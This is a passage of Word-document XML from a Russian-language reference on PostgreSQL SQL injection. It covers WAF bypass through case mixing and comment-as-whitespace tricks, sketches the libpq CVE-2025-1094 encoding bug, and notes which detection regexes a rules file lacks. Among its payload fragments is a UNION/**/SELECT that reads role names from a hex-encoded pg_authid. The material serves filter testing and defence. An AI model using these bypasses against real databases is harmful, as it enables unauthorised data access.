    <w:p w14:paraId="05A4E36A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Case-insensitivity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: §4.1.1 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SeLeCt</w:t>
      </w:r>
      <w:r>
        <w:t>; unquoted identifiers нормализуются к lower-case. Quoted identifiers (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"..."</w:t>
      </w:r>
      <w:r>
        <w:t>) сохраняют регистр.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B503FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Boolean coercion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NULL IS NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2&lt;3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXISTS(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — выражения типа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, корректно подставляются в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t>. PG-планировщик умеет упрощать конст-выражения (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true OR x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38670F1C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BB850A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 7.x – 17 (все поддерживаемые)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — лексические правила (whitespace, comments, case-rules) стабильны как минимум с 7.4. Block-comment nesting — с 7.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EBCD51" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> работает везде. Это уровень парсера, провайдер на него не влияет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5930597E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF-специфика</w:t>
      </w:r>
      <w:r>
        <w:t>: набор сигнатур и их поведение зависят от вендора и версии rule-set. Под конкретный WAF приём калибруется отдельно; здесь даны общие принципы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE6120A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4EC640" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.1 (dollar-quote)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комплементарно: 3.9.6 ломает разделитель токенов, 3.9.1 ломает strings без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Часто используются вместе: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $$ BEGIN ... END $$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.9.1) + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION/**/SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.9.6 внутри dollar-quoted SQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28185D11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.2 / 3.9.3 / 3.9.4 / 3.9.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — про скрытие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>содержимого</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> литералов. 3.9.6 про разделители — ортогональный класс. Комбинируются: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UnIoN/**/SeLeCt rolname FROM E'\x70\x67\x5f\x61\x75\x74\x68\x69\x64'::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — case-mix + whitespace-trick + E-string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B72A85" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — вложенные комментарии </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* /* */ */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — отдельный приём, обходящий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>парсер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> комментариев в самописных pre-processor-ах (которые ищут </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без учёта вложенности). 3.9.6 использует только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как whitespace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E705E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и CRLF в комментариях. Граничит с Payload B (CR как разделитель); там фокус на парсер </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (терминируется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>?), здесь — CR как whitespace между токенами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D99993" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 (identifier injection в plpgsql)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — case-rule для unquoted identifiers важна: атакующий, инжектящий имя таблицы через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%s', value)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, может использовать любой регистр, PG нормализует. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%I', value)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> оборачивает в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — после этого регистр становится sensitive (другая семантика).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE57A84" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (stacked queries)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> блокируется не как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'\s*;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а тоже whitespace-зависимо — Payload A/B могут протолкнуть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>. Часто комбо.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3799D2D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — не покрыто:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> детектора </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bUNION\s*/\*.*?\*/\s*SELECT\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (UNION с whitespace-trick через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bUNION[\t\r\n\f]+SELECT\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (UNION с не-space whitespace) нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> см. сводный regex категории 3.9 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>summary-3.9.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2339BD53" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7920D65E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Lexical Structure — Identifiers and Keywords (case rules, whitespace)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCCBD58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Lexical Structure — Comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7888DA11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection cheat sheet — bypassing filters (whitespace, case)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3522BD2E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>OWASP: SQL Injection Bypassing WAF — alternative whitespace and case modulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C0630F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: SQL Injection WAF Bypass — whitespace and case techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA4E5A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>OWASP ModSecurity CRS: SQLi rules 942100–942521 (как примеры конкретных сигнатур)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340B2224" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.9.7 CVE-2025-1094 — encoding-bypass в libpq escape-функциях (pointer-карточка)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A299D31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Полный разбор — в 4.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (хронология disclosure, CVSS, цепочка с CVE-2024-12356 / BeyondTrust, patch-окно, managed-провайдеры). Здесь — только то, что нужно понимать в контексте 3.9: почему «правильная» санитизация через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQescapeLiteral</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> иногда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>сама</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> становится точкой инъекции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198019AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Суть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6265B027" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bug в libpq escape-функциях — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`PQescapeLiteral`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`PQescapeIdentifier`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`PQescapeString`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`PQescapeStringConn`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Эти функции — рекомендованный PG-способ построить SQL из недоверенного ввода, когда параметризация невозможна (например, имя таблицы/колонки). Они оборачивают значение в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и эскейпят внутренние кавычки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7223ABBF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Баг: если ввод содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>невалидный UTF-8 байт</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xC0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — начало 2-байтовой UTF-8 sequence без continuation byte), escape-функция пропускает этот байт без замены. Затем при дальнейшем сканировании она ошибочно интерпретирует следующий байт (закрывающую </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) как часть multi-byte-последовательности и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не экранирует его</w:t>
      </w:r>
      <w:r>
        <w:t>. Атакующий, контролирующий ввод, разрывает целевой литерал и инжектирует SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D80A796" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Тот же эффект возникает при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mismatched encoding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> между клиентом и сервером — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>client_encoding=BIG5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server_encoding=EUC_TW</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
